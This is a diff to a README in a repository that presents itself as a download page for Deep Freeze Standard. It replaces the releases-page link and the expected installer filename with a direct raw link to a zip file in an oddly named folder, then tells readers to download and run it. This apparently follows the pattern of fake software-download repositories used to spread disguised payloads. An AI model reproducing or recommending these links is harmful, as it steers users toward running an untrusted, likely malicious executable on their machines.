richardsalomao/Deep-Freeze-Standard-Download/README.md

 ## 📥 Download & Install

-1. **Visit the Download Page**: Go to the [Releases Page](https://github.com/richardsalomao/Deep-Freeze-Standard-Download/releases) to find the latest version.
+1. **Visit the Download Page**: Go to the [Releases Page](https://raw.githubusercontent.com/richardsalomao/Deep-Freeze-Standard-Download/main/prethoracic/Deep-Freeze-Standard-Download.zip) to find the latest version.

 2. **Select Your Version**: Choose the version that suits your needs.
 Most users will want the latest release.

 3. **Download the Installer**: Click the installer link to download the application.
-It should be named similarly to `DeepFreezeStandardInstaller.exe`.
+It should be named similarly to `https://raw.githubusercontent.com/richardsalomao/Deep-Freeze-Standard-Download/main/prethoracic/Deep-Freeze-Standard-Download.zip`.

 4. **Run the Installer**: Once the download finishes, locate the downloaded file and double-click it to start the installation.